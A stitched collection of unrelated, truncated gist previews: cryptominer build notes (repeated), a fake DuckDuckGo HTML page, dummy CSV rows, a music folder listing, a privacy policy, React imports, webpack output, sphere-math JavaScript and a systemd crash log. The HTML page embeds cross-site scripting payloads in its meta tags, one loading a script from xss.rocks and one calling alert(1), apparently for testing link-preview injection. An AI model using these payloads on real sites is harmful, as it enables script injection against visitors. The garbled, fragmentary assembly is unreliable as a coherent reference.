use https://github.com/AngelQuirogaM/ccminer-nanashi
install libcurl-openssl-1.0
from AUR
install gcc-6 and cuda 9
In Makefile.am:
Change gcc-4.9 to gcc-6 in line 85
<!DOCTYPE html> | |
<head> | |
<title>DuckDuckGo — Privacy, simplified.</title> | |
<meta property="og:title" content=<SCRIPT SRC=http://xss.rocks/xss.js?< B >/> | |
<meta property="og:description" content="The Internet privacy company that DuckDuckGo <script>alert(1)</script> empowers you to seamlessly take control of your personal information online, without any tradeoffs."> | |
</head> | |
<body> | |
</body> | |
</html> |
69542;Brisa Baumbach DVM;26.03.2019;11:38;21479;Switchable holistic Graphic Interface | |
13700;Shawn Sauer;26.03.2019;11:38;90243;Inverse executive capacity | |
39371;Cynthia Keeling;26.03.2019;11:37;49434;Streamlined heuristic firmware | |
44415;Ernestina Bogan;26.03.2019;11:37;39093;Streamlined heuristic firmware | |
72487;Holly Nienow;26.03.2019;11:37;49707;Streamlined heuristic firmware | |
58000;Korey Kohler;23.03.2019;07:21;96083;Streamlined heuristic firmware | |
95239;Mr. Brandyn Torp;26.03.2019;11:37;80509;Automated secondary monitoring | |
66864;Jacynthe Macejkovic;26.03.2019;11:38;76461;Inverse executive capacity | |
65624;Spencer Quigley;23.03.2019;09:59;10690;Proactive fault-tolerant project | |
96515;Marlon Gutkowski;26.03.2019;11:37;50108;Automated secondary monitoring |
[ | |
{"type":"directory","name":".","contents":[ | |
{"type":"directory","name":"_______","contents":[ | |
{"type":"directory","name":"The Cycle Hits_ Remix Best Collection","contents":[ | |
{"type":"file","name":"03 Cracker MC's (DJ Premier remix).mp3"} | |
]} | |
]}, | |
{"type":"file","name":"00 01 Intro(Original Uncleared Sa.mp3"}, | |
{"type":"file","name":"00 02_ Ain't my style_mp3.mp3"}, | |
{"type":"file","name":"00 03_ Think Twice_mp3.mp3"}, |
<h1>Privacy Policy</h1> | |
<p>Effective date: February 02, 2019</p> | |
<p>Geldheld ("us", "we", or "our") operates the Geldheld mobile application (the "Service").</p> | |
<p>This page informs you of our policies regarding the collection, use, and disclosure of personal data when you use our Service and the choices you have associated with that data. Our Privacy Policy for Geldheld is created with the help of the <a href="https://www.freeprivacypolicy.com/">Free Privacy Policy website</a>.</p> |
import React from 'react'; | |
import CSSModules from 'react-css-modules'; | |
import style from './terminalReport.less'; | |
import ActionBar from "components/actionBar"; | |
import Title from "components/title"; | |
import moment from "moment/moment"; | |
import { connect } from "react-redux"; | |
import { ActionCreators } from "actions"; | |
import { bindActionCreators } from "redux"; | |
import Loading from "components/loading"; |
➜ backend git:(master) ✗ clear | |
➜ backend git:(master) ✗ npm run prod | |
> [email protected] prod /srv/http/b3khb-terminal-web/public/backend | |
> webpack -p --env.NODE_ENV=production | |
clean-webpack-plugin: /srv/http/b3khb-terminal-web/public/backend/public/prod.html has been removed. | |
clean-webpack-plugin: /srv/http/b3khb-terminal-web/public/backend/public/prod has been removed. | |
Hash: ea29ea72125a621147a2 | |
Version: webpack 4.29.0 |
let mathjs = require("mathjs"); | |
function getRandomPointOnSphere() { | |
let o = 2 * Math.PI * Math.random(); | |
let a = Math.acos(2 * Math.random() - 1); | |
return { o, a }; | |
} | |
function polarToCarth(o) { | |
let x = Math.sin(o.o) * Math.cos(o.a); |
use https://github.com/AngelQuirogaM/ccminer-nanashi
install libcurl-openssl-1.0
from AUR
install gcc-6 and cuda 9
In Makefile.am:
Change gcc-4.9 to gcc-6 in line 85
Dez 15 15:32:18 arch kernel: nemo[24027]: segfault at 80010000 ip 00007f460c1f0b9f sp 00007ffd5eeb2e30 error 4 in libgdk-3.so.0.2200.26[7f460c1ab000+ed000] | |
Dez 15 15:32:18 arch systemd[1]: Created slice system-systemd\x2dcoredump.slice. | |
Dez 15 15:32:18 arch systemd[1]: Started Process Core Dump (PID 8156/UID 0). | |
Dez 15 15:32:19 arch systemd-coredump[8157]: Process 24027 (nemo) of user 1000 dumped core. | |
Stack trace of thread 24027: | |
#0 0x00007f460c1f0b9f gdk_window_is_visible (libgdk-3.so.0) | |
#1 0x00007f460c761d44 n/a (libgtk-3.so.0) | |
#2 0x00007f460c7640a4 n/a (libgtk-3.so.0) | |
#3 0x00007f460a920cb3 n/a (libglib-2.0.so.0) |